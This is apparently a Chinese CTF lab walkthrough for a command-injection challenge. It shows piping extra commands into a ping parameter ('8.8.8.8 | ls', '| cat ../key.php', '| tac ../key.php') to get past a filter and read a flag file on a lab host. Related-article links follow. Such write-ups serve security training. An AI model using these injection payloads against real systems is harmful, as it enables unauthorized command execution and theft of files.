题目4 命令执行(保姆级教程)

url:http://192.168.154.253:84/ #打开http://XXX:81/,XXX为靶机的ip地址

审题

1、打开题目看到有一个提示,此题目需要通过利用命令执行漏洞执行Linux命令获取webshell,最后从根目录下key.php文件中获得flag

2、开始答题

第一步:测试命令执行漏洞点

|---------------------------------------------------------------------------------------------------------------|
| 1、传参 8.8.8.8 |
| |

第二步:利用漏洞点拿到flag

|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 猜测是执行了命令 ping 8.8.8.8 直接构建payload:ping 8.8.8.8 | ls 传参: 8.8.8.8 | ls |
| 应该是过滤了一些命令,换命令执行 执行语句: ping 8.8.8.8 | cat ../key.php 参数: 8.8.8.8 | cat ../key.php |
| 执行语句: ping 8.8.8.8 | tac ../key.php 参数: 8.8.8.8 | tac ../key.php |

相关推荐
终焉暴龙王5 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
水瓶_bxt5 小时前
Centos安装HAProxy搭建Mysql高可用集群负载均衡
mysql·centos·负载均衡
小码过河.7 小时前
CentOS 搭建 Docker 私有镜像仓库
linux·docker·centos
贾斯汀玛尔斯9 小时前
ubuntu/centos系统ping 不通域名的解决方案
linux·ubuntu·centos
半梦半醒*11 小时前
Linux网络管理
linux·运维·网络·centos·运维开发
qq_4309085713 小时前
网络安全-机遇与挑战
安全
安 当 加 密18 小时前
守护汽车“空中升级“:基于HSM/KMS的安全OTA固件签名与验证方案
安全·汽车
大咖分享课1 天前
多租户系统中的安全隔离机制设计
人工智能·安全·安全隔离
荔枝吻1 天前
软件异常读写威胁硬盘安全:从过往案例到防护之道
安全·硬盘
小马爱打代码1 天前
Spring Boot 接口安全设计:接口限流、防重放攻击、签名验证
网络·spring boot·安全